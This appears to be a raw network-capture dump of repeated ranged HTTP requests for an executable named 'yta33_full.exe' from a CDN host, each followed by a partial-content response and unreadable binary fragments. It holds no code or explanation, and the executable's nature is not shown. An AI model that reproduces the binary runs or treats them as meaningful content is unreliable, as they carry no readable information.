.B...... .a.b. .. '.....~e..f..c..3......6.6.?xK.(t..p..@?.Rs"..n.../.
...7....IO..7b{.t.....$ ...*..R.i....6Vt.....x.v"..._g..[3.\OG/.-...y.
..z....M......w.M#...*..r..W"t.eT%.@;.9b0p.-.$=n..H...i*T>..xVL,vA.
w].&5].?A6A.....6Q.v.6...zU*..~:..bGh......GM.3.c%.}.....L.4.C....
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 750000-999999/7590800
..|.b..dA..z..j...I.1..../..5.!5...L.'..?|.2...'(.......a.....3:3.i...
E4./...Y"..VH.bn"..IC".....Nvf^oN.1..S=.@}....YvV..?..%{......&.^.c.=.
....1m.N.[........o.<............v.|.....n.L8}d..<oz.z`6pv..%..6
rm."./.....q..y.......!.`.....}....i.....'..".hT.....]......4G.8A.....
|.4S.._.*J.".\e..r|....`.....,].....SR.?{GV......;....!.r~i`._....z.M.
y..c..y...v....rW.aT..q.q.m6dB...s.I.*....W......u.......Fc..Y.69Q....
.%....%....U~..=.........X.I.y.K...gY.>.T.....9g ?p\~...... *.q....
...b.A..Nq^."..R'S..W.1......>..`<4.....yCh*-.!.}E.g..i......../
......]...c.v.k....8..?.G.l.........5..........g..}.2.O.l..r._..q..G}.
......3Z.....}.....O..p..,Y..4.'j...L....@ ..$.~U.....6.O..Fa.).V....b
U...].... ^oz...@.....)...:.s.{.u........%.K_&f...*..f>...o9.1.....
.pH....-........a.u!.}s.......A.m........M.=<[email protected].......
.3... ..6.......<..r.....=0.3G.d.M."|..\.:.1.K....y4D..Oh.....=....
zq.z<.h..o..F.a{o3..J...r/.l*l.AE.."&.!..;.dK.3...)@.......f.u....-
..EI.c...v....N.T.U@.........*.mZ.... ....~..e.x.....C.A..G.#4........
g...,....9.-........k..|.\.w).>(Ao...%@...d.}.c...H... .JCQ6. 6jX4.
..Q.....zx)....y.....).......\v.... F...S.:mKd...,.1C #[email protected]
.3. .g.^.G..o=.2)....I.....gP...&4...=..................q..|.l2..1..8R
...:;60a.@.$..J1H.}.......!W..`..p..h.^t.....D..\...1.O.An.....4......
.K...\I#...\....;5.Tj.M).to,[email protected]..#.C>c..0 .q..4......
...Y.<...K...D.:?.......b..?...{^.a8........H...N&.$G8.........%Bg.
.F....K*Q.c8%`..l..4..I..$E5w......0$..#....pl6..W.....3.R.....2..
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1250000-1499999/7590800
.#E.,.F...:-....B...M6.....f.C....V [email protected]. ......X...I.:E.'i.
%..2.c...$...0`......B.m ..OR...y....... ...@3...%y.<S,..m3......j.
.yg..Y..n}%...C..F....Fc.7b.oQ.K.......!......Dt.....J.Hf......@...?-.
_.........F..Y.k...P...2K......J..*.c..f..........=U.....aR....DV.C...
..v5.CI.o........On.../.!U.GSz.~S..Mf........{[email protected]&
lt;....&....K..2..:....C"..-..N....O2...iQ$......xvK..=.#.'7..<4.(X
.`.,RF..n...V^..9...KT......,.M.9.'I7sY.7.}V......%.......^...ltZ{y...
*..3......`Y.........T7..q........7.ad..0.^..`...nQ..I.SJ......x....q.
,S.v..N..e=.G...X.w...%>..g......o^b......c......R...$!.U?4.:x.8...
._.R-..f...0D.j...0.q(..x).#.]...dj`jB-40K..<#.......'..V&tN."..>
;[email protected][email protected]".p.g...
[email protected].^....*.T3"QJ.....&..F...... o...3x...
...!....>..\.!...f0.-.......l#[email protected]..."..../.=n|.;F~G
(s...[....P...E|..vUl. .tK.!Ki...w.7.....Av .bg.#.`K.v.J|.!S..]...?...
.....h.....h..t*...r...w.....t%.W........\C..n..{Jm.............F.....
..n..V..b...b..s.,.....3..?v.Q.H..=U.V.....%....6^B...d.F..O3.n.m.:.k.
.{^...T..4..........$.........b.{.):..w.a.}...$...ctW.o...6`).!.Za...H
.....Z.....'m?..w.<..]..$...M..`W%9t0.....>.;>.n....7..Z.....
#.._...G.\..j.....5.T..{..9..Bq..l6......Dn.%.s..:..I.9..C..|X..}/I.. 
.OJ.C..y]....$h.8.W2..CvM.d>...[..3)...'..3O..3>...t...>...L.
. )...V.....'.Hi..U.nM;R$.3*....2|b.|....v].9...-..I .m... .........h.
....GC.$sNq..e68.J.B...r..0<....3.........^.&...k.....HDt......
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=1750000-1999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1750000-1999999/7590800
4...f.}...K....]([email protected] ..E.7Vh... B./.6.S.zZg....|..*P
.1y.|.....$.`.z..y.....V....CQ..E..k.xCme......{to....]..Ig1.5.si4..-.
=..I.6.....cJ...W.<..MDf....`..1h.>...b..G...V.o....l!..^.5z....
...`.<........8.Z.M..O.".......R&...8,....../.....H.........n'.-|..
....i.ys.]....e....s.....-...NP..6Yl....9..k.#...(gq....V....:..}..z.(
...!....ny~v..k.......'_....iT..^A.......}ahPB..O.l.......I6..9[..M~U.
..l...9.aB.*.I...... _...^W^.....,.|........h..w.v..m\....(.b..G..@...
.....0.O>.......<3.S...1...8.>."..FR.w3.I...7......$.0d..7)..
.@".%.Kfv<......|..........`..0n....5.....A..P.T....{9X..V...n..a!o
.....3..>.R.o../D6k>q.#-0>u.........'.jz.4. O....(%...^er..8.
...^P.....t".a\...2..X......]...If.,;r.}.b.......6|.t?C...b.V...'....s
v.cse&...Vv.E8.V..W.dzr`.\....d.y...7....H.....t.....{.2.NL..=o...%.#s
..2a<n..q......R.....OY..8>.=.3.p...h9..Vb'[email protected]..*
..e;.(]..S.%l......(...!..f.,.)... .(.-...V..d&.RV~'..H....R.:.R.WG..F
.....9.u. [email protected]....<......2.d......P..\.oZ..4./....#.*.Go
.....*.....ix..?D.1...ES.....Z..$..)...."..|.....m...?.L..%.....^.. bb
..S.l.....k..-.....G.p...qd..Q#$HNp/..0.`....Ed..*g..Up..ar.H..>{.L
=4Eg...}.-L...p....#[w..*g........7{I.n>S..v. ...^./-.........4Y.oK
QHRp..L*......;......N....1.G...~v...<....&..X.^.P.0t3.G.X......&."
...\Vx.1\<sp.%.3M....1.'.~...ur\..YT~.....[L....Y.#...T.[...Gq~...{
j..r-.$.<`{..m'.BK[/.....Ue. Q%[email protected]..\.fZ)o...T..a.l.
.Z...B..YCHA....R..k.........]).5?t.N.l..Udi!....y.X...f.`U}z.n...
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2250000-2499999/7590800
..".R.....[`...P ..c_H ../.......BA....>.....9.x...[.[D...........N
..V..y....zp`...^{.e..h6p@._.2..........Ce...{....=..{..............#.
...f.!I....J....(..~.W3L......)X..3.3.''.3=.[..^Z...B.|].e{5..k..V....
....f.......&Uc...f.lR\i..j...j.......$uYF..... ?...Yc...,.2O.b5.P....
A.'r.!..2.," ..". .d^...:`&~48..N ..s.....!||@@..!..7G...O8.L.S.F...).
`C.m4b.....t.%..S*..>;'."|...Bq.....v...*@t.E..H.<........h..GK8
/...JB.....(...%..G......h.8..|...L...x.H..JtQ..@:....."$.R......p.G.I
0....D/(.JF..J..)...]\t.H...CC..'......j.......!.B:B.L...Hy...BcP..O..
..R.*...A*U.S..0.B.rhdC..B..n...._...v..A.........P0J$D...f..p..D.(...
..8..."r.J.%.|...j......".-..-.......n.&.$Z....R......>h.=7.DJ.".s.
H%#_.h....>... .W.N..oG=.B8.......9.L.f.....Y.s-..!....<..d\..S.
^..........A..."..!.Ay.g.I..>..0"..j...B4...G.7....bG~ .B...,0Z~.B/
........C.A.....$<m......{.{;...r.O..G.L.93.%q.c. ..........&t8.P..
f....U...DL......i&.%...,Y..Q....'.DO....H3......Xp;...m6.o.5.(.M.SR.X
...HkFRG...h:..B....9..F...M=.Ea.mr*.&5.P.3.......~.K..c...C..U..s'..9
..F_....P....nq.P.............(..A.........OD...G.2.?I....K...\.....3^
.l.c*-`J.D...C..$6.7.....*z...QQ..D...".r...$;B...T3rN.........0 Elf_K
...In~9.;......qT.T5!... )N.E.T$.>.a.).D%E.......}.G.Z...Y.........
...H.l.....X.e.*..v..D...S...`....z..&.K........o$p..E=..(.......I[*..
.o."...'!CH0......."$>>......d.G.....3....@(..^Q.....j.rR..AA..i
.Q...,.B...j.......a.j. l...a......d.h% * .....J<..b......"O....I."
\' ..;..8....`[email protected]'.DH..q.C(E.E.R.4UO..q^..Z
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2750000-2999999/7590800
............N=/D]yB...H....5.S.x.so.X..5p...U.b.V.l..).{....{.T....BG^
..H=..e...../[email protected].[`93...i'..Y..!......i.S._2..
.d..... ..P & .mTJ.../g..3.9..or ..w.}.X9.w_09x.!.....T.h..$..{.8x.U..
wS~.j.....?..e....}..<.l...|.uy.O,.E.r...<.....A.!x....J.....S..
s|..CJ..$..........r...<r..Pr..."8e..yQ..SRzBXN.?.!...Q/....[.S.;n8
9dn......ka..>'...w]@r0....pV>D..w[....?-..9.TOIy_J.4.u.......6.
.j7....`...}.f.u....]..jnZv-..|z.?f...............*[email protected].
....'..., ............9..V...,;...v.]...o...OZ..V..[e..U.[..H1...nr]..
=.."....k?1....W...}..u.......5.b..v...2.....G....;.Z...gLopJ..h@.....
..._8.... \;.....y2.../.. .k./....x..R.......G...B.......62.......h.a.
.6Z.......:.C ...g.....(.....qL=l.......[|.,.....x8.o.8.-.n..P..%...Jt
....u.........C.........yy.0.........e6.}5*.g.1.. .>.....k][...?...
~Za.*.......j..LQ2r.`/...<.Nt...$...A{.K;..p.<.....*6..... .`.t.
Gw.....K>.4....d.Vn<.._.V......H}....B..],(..v.=.J....6.0.......
.T.g.xd?]g....P.5.....9..!.E2....{...>.h........=.:?R|....s.......F
..............}........bi2.r.!.....k...<D..Gz.E``#./A.D...M(3.>.
....L..6.4.f..:.#;-...W.1n6v.g.2. [email protected]=8......k.8,...3,....6.y...L
.......-.3......x.C.o...#H6....|.7t%[...hr..l..<zM.g.........Y..-r.
.zM.w;.>.].~...<[email protected][email protected].....{....."........
....../]?....7t1d.g.3..).`.<.~..f.r.j...)....p..B.u_...i..W........
..R<}}8.G... ...}.3..n.(].}..i....Tl.:..BW....._...P.._T,.^...XC.F.
asn....9..8.,&}..F..G.......<...:.Y......$.G..i.L..e...q.c.S...
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=3750000-3999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3750000-3999999/7590800
{M......v..].!..=F..)OS.b....MRKR.U.W.V.\5..y..5..F....-.[.cS....Z..oi
..]0...8...a7.:'Q..Nb..I.&..o...~h.......l]>...&.8Bk.!'b..dGN....,.
...S...6!s.r.J.J,U.W..TZ...Y...KwVe-...~K_....S..`...53...J.H.<..0I
.a.C......}d...].<....K.dU.....[........<:=.2...eI.R...J....{r..
v..l...z...].&....x..\.V.i.Q_'..].&b. ..;.p...2!.....>:.,..)..._...
n>..Dm.....sgFV..9Rk.A.$.U.[;{b.T.\Ju{.~.s.y....fe.J!..cQG...K$.!..
....ze.d/._h.[..4.t9h/.hZ...U.d.....Er.n.m.m...U. .{..d8...V......j...
.7.-.D...].o^g|......z.s.A.Z#...j0m...1...r.v.....gV.....i..D..9...BI.
1....(.a.....(.K~0s..S...d...................&,....Fh.a...r..X...6...%
Q,..T[).R.JY.....jr.jg..ye.eq.7..j.c.^$MG...ZP...xO(/..}I...O......S..
...4YT."[email protected]....=.l..EL....2<E..?..T.s.[..
.?.KT#.%.......~....i.4...i.VA[..4H..R..% .......L3<..>.!......0
.........,..8.B....l.r..,#5.....;....sP.A.9%<%.KHK.H.C...v%.K)../:-
.\.u..=g..vje.....V_[.....Mw...U^W..uY%y....idT....N'.N\..p.a5..T.-...
v1.....<.._3.RfI1..V..vs.....h.MS..}..g.......<.......;...*.....
...%$...........?..2~...........@%..X....Yli.-..n.........I1u...2.6Y})
.R:..4C..Q..u..".c6...Q(..P!..n..C..\{...].]Jp.....\.V......K.:Cw..J..
.....e. .K..W.p..n.l.T.....'...]b"c].qh.....*9lF.,!R.y#.%.G../xuB...i.
*^:.7.......EB.~.d..]...yv...Xyr......0^......I ...9.f.&..(}....O...m.
....^.........q.Evp.u=...F.8..l ..yc.fb..m..,).....q....68...6T..o....
I.)-U..F..?..9..;..J.N..P..`..v.X.._..).^.y YWb...h....&....n.X.c.....
Ij%..%....M$.1......k.....Ji.%...p.p.8....D.......i.{O.r..........
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=4000000-4249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4000000-4249999/7590800
[email protected]%......&K...;..%....!..6Z...}.&..^3u......R:.P;O...=3 ..
q...l.U....U......V.an...X5J.j./!y**......nf....7.L..3!.[.L.uJrU......
 5.... ..r..%...5t_.5~W..........d...<.<..E_.y.p...O..".~-......
Tm4..~f.X%.2}S..0L...I.R3.7.1.J\.....?..m.<... [email protected]..<...
..mV.z![E.%.:.r.)^.;.u...w...C.8...{...)...&v.jU.z.\Db..P..e....I..~.Y
..^c.OV`......=....\.Dc3...).{...o[.O...........2......:...K...[r....;
.t......u.....F.\...Eb.....\..d......g5.3].?52....."]o..UF.....:..1Nv.
....M:.......h.q.....l..-8l.....S......ca8u...lz}.~..-...`..:<s....
w.dz..6V....z./...@B.......`.....w..UA.;.........%....L...a.z.i.:..VUu
.R..\W.-.....5......R,..P.v...1..s...j.......Zn.(....c4.v...C|.n...<
;|.....B..Md{.E).../...S..rw"...H........=).u.....H..?.....Q.Y|....B.M
.....$.J.]...g.J.....z.{...a...e.9...)....LD.rA.>......*...D..@.<
;..C..C...br.n(.'.?m.Ba.......}...=....>.yMf.....m8.pi...'j..F....=
F.8.$......ci.Sq..k....z..8.....mY.%..a10b.>0.N..R..H&.#....(...)..
..m!G.../...q*".R.....S....5.....$..s.P.....(..u...<\.....p..Cq....
..O..{....A...........CR.2..'N......B..........t.c:=..N.t.KY:.&%q..:=.
:.o.1b.G./H.?._3..;N..w[T.>.b...fh.S...^Ij.g.l.!Z.....D....7.......
*....p.\.n.... .UDO..X..e|[email protected]...#i..........xO}...?:......u.
.....Q.X...y.azp...0p..#.."JD.;.". ..sG.b\....Fjh/......!(....;......J
.o4....v.......<*pr.8..TrE.>Jn....Q12..w..F...#....g...;..X.....
k{........o.'..........m....D|.mGk.R$...*.R.......c.{........:.i...)..
[email protected].......|.:m...
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=4750000-4999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4750000-4999999/7590800
 .0S...n.HC..(k..m]V.........V..R..;_lEM?Q$7..;..e0.>i.D....F_Z....
..!&-..e....D.%^*.._.X.....Z.E.F]....fY..ZK..mf....v.G..?.9q.....0_.n.
K.U.fxS......i^.6A.;.3......f.....D..[k...\....]..mO.Y`P..6...b.l9(..7
E..3.....n5...).b.....D..z..4s....?....P.a.......b/...:.7.%P....".Vu..
7..'.e.....x..%$.*......f.j..q...QX..%."N%..n.3d....*DO.7El."...|...].
.T.....a................yzdg.4..s:.Pg...a.~%\o.$@;.a.D...|d.{.....|lp.
#....{L?.^b.04wg..n.B.G|.,.."..>.1*.#.. qU...>...'..K..Q.,..Y..8
..r>...O....a.......Jb....KN.P..a.=s../.$4...B...G.6I../U$P0.....;[
.P.>j.[..Ebt..!..R..!i..v..J.........e..........-.........o..z..|.a
F$...nP.C..J8...W.H..._...L'.%DL("..%..w..l....g"..Qv.5...g._..iH`.)..
.[u9..[[email protected]."........N.Iln_...s......c H\)...........Z.q........{...
/T.....kY.o&K....vw.Vg.Oq]...0.0...X#kidH.PI...1.. 9..T.3W.y}..=.....,
g..R..N..'~....w...H...P..bCUT.7.=.\S..4..U(.....^..;A.b]....e~..Si..H
.:.C.....0..?......Q......D.B.H..-N..w..[...v...S...U2".....).....`r.w
...7Z.p.....<UV...$...m..6.-.c[O....U.M..$./.,.........1k.9._h....v
.c.(.....s..._bt1(o. ..HUn.D.....v.....J...h6..t.9R.;/.= [email protected]@
..(.#r.[......mj....f.={uj.........2r...rV.2..0....P(....P..E....r.#S?
.....U...'TK..(......O.c\...W...r..C%..:-...,..wX.p..1n.-z2..A.h.:8$.$
v........\.....M...m.4?v..[.|..J.4nq..&..1......Tp...p..5.\...6:...E#.
2..O....A.h.S9Ed..g..kn..h7*0`...O......PMr.z...QYNA.......%...|...Z .
.-.(z..a..F..h.Z.mBeF1 fmn/...wb1E....}*[email protected]^'zc.%M.&K.E....n.M.w.d..
(..r#....d1.....(E).{..R...u`y.)h.z.&v,..s>.B.z......;..b.4:TL.
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=5000000-5249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5000000-5249999/7590800
Z]X.z#.m........C..].|..&.#CK...j:.S..6..n\.Ob.x.2U..,..........7.8...
.i...W.F..gO...?....\.~..|5=3W$.o._.r.2..I..)...4..w.....#/.m.......=&
M...}.~2...:6.)..._./$e/B..p..o.........%...`r#Q..)....$..nm......ZS..
.>....*..^g&=....F.1.&...v&..kpld. .Hf'-.)..w..6..a....n.K....X.v..
...FyeP.?..m .h]l.!X..@[....b,.O.. .pY.%.|...I........h.(..mF..}>3.
.6hypK82[)...j~T...N..o.....o0..Vt.}_.......nh;O.4UP..."L K.x.=s.;..f.
.h.V.`.y=-O....`.m.C.!r#...5.2..'.$?...\b.3W.lr.M.[..9M:7.0)..~.x.[.M.
.d..z.t].sG.r....:..l...p........yD..B..L..........^)G.Q.y.A...n.....E
$.KHH.........HZXl.PZ...7..@....._G.3p.c....O..C.n....>....IM.`.g..
.$k...m...H.<*...........d.\.3.#.p.Nn.=..].....Vg'..C ..L.k..r.X..w
...W.....C...4.v.L..U.a.r4...... ..:...."....#6..&V.lK}.o.P|.p.. ....#
.]...b.C....p.n.........`...O.x..s....  c^..h.BF.n''r[)r.G.PX.T.._...)
....N....7.Me....g...NJ.B.Nc....*.. ....D...o..._AW/.u.9.z5.j3.4..x..#
.3....G......ix...cZ..2..vI.c..;v.._......f...L..ZG.T........0....M..6
S..y'e=.J.......-..Ut..OH....z.Bn!...f..s..d...&Z.2..4...K.P...N.4....
....n.1L.mGB..s.Z......T..O......v..n~.....'. .x3......X....E. ..,a{.P
.....S.>...":....../.{..gs.......1:. .S..M.L.n......>....|..K...
}.3....xx.......|..xM..].r.v.....Jo.z..."=.O........`..O.%.......n...i
..u....=....Dq`Y.b[....J.......b.........$.t............C.0#.......]..
....f...z.........,{b.....#.jn.Z.~.......1..N.y..j.`.6.X6.u...K ...:..
..!.\..S.....H..i>].V...y.............t`W....v.(...._^k...]...n.NZ 
..1I..JkY.cf.>5H...Fj...:v.p#E0...........l..[8....n.....v....]
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=5750000-5999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5750000-5999999/7590800
Bmd[..~..{H.......wa.?@.$...7.:.<.YL.u...Y.N[j.@Q...#...d@.."V$5.#.
......".C.....Z s.Z.< .X.....r...w-.........-W..0.............. .V.
T...E..bH\:]D....'(X,.,..6...C$k.X.H...T.4r....(...$.N.n.jO7....R...)v
@G..6.XF..n..6....j.T...g...G. ...=0^....G`i......N..;5^.W.`.H|..I.b..
..aU=M.%&/x..x.}....V.`.p..O.A(3.i..Q.'....F...B..c...Z.T...2S...H.Y.V
v-.1.......JI...=9=....G:...#-...1..]V.j.....f... ..P.Q....U....E..D.Q
.`...L.#...k...t0bb....Dm.C....f..MS*J.......}..j....v..............I.
-qj..\~p.W..n$HW;.|.&\..4........}J..h.w55^.vg.Lq<wI..........}....
..;w9.c.O...(R....0..^[R..1........ 6...g.....?....l.&3(.y.Q-y:HN..>
;p 4.]......yO..m.H.nc........>..[.....B.x..........BBx.........TA.
..B.0o3.tu...q.X....v/....t...fd.......'..x..u.K%..e$)......q.lY...U..
C...L..E.....T^`#..NE.v).l...#.....u_^B*.6....O...rA......}.o...|sq. .
....$.>.hi..{..ie1....h..J4.z.*.G.].VY. dCj._....$..XH...b..W,.....
...!...S...-m{.xh.. .v....CYO...d^J..i........n.'|..t;Q..........Q....
y.o.. QG,..E..iC.x.'..........oh.r....\. ...SOnQ#,erC..kG...(.*.(..L. 
.B)....W.-......?..W....w.|...L.....W....IF.....B.f.o...'..,\.`....|..
....*...6.T.L`.h3Q {.x.hp..>...2Vo.x.../xzE.b.u...b...m..Uai.....1.
.....2i0........QW.....\%7.........Z.."......1.....]....@[email protected].....
m._./.8....Vj...~.0....H.W..Cv..h..4...y.>FR8...M.?sE..L-.)...$~2.g
...B.,..V.u......J.E.....{>..........!......4.S.aPX .uL...i-}1..V..
...H.Bm....K;...2ZvA.....p2....a.m. q..6>..}%.bR..J.......".-u&p..@
[email protected]..#.
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=6250000-6499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:20 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6250000-6499999/7590800
=c.#.....6..0........!Fu..~..:.........<9...........~.....i.3.K.MdH
...F.0.I.[.F.....Pt....3=W*..l..-.....|.C................q..!y.@...;.0
.u..R...u.......e..'.H.......C.'..l...s6 .X6"..X....b...%.7....Cb...Q.
."l a..V...LP8.'#.....#...;.(Z#....r.[....W|....QR.R...Ly:..#.;...j.w.
>.....7.[*.....7..v...7g...".1X....[..2... dh..K.......(...Y.......
bs._Qr...B...bA.6..@.~.u\.....%..4..9o.9...).D...\z=Zj".....Eay.}&%z. 
z..}.*.L.4..l\r.:.....5n.e*..V.J... D...j.~.zQ.......5B|.`.O..Xl....rA
.... l.`5dPj8 ....3.x...o\....'Y\oy..A......H..../..bt..u:J.3Q.F..I.jl
.....P...C..[...V.k......x....c.i..Hmu.. ...nL....g.Z$!...X.j.Z.*.1.J.
.xzQy{$...WS....{S..f:...4..\.....e.l........".i.s.&...;...]...%zL..J.
cI.y......G......B.`-.....d..j.&/..*......K...s...8..E.`....~.F.*.Es..
TO4..1.....L|B....h7....P.d..p.....N.0........N......i,&..;......M....
...sf.......1....jc..K...`I<......2..'....m...F.s....c..e10.!3jOu..
E....l.&.....#...g..@...[/...i...{....Y/...b.G..8...C.3..2%...;..d....
..zq..|.N....!..]..u...fu.6.....a....)i... ..I..L}.jMA...Y...).>.ZH
..<...S.[.....). .y..l...^...1?.YR........",..d?...C...".....?..k.W
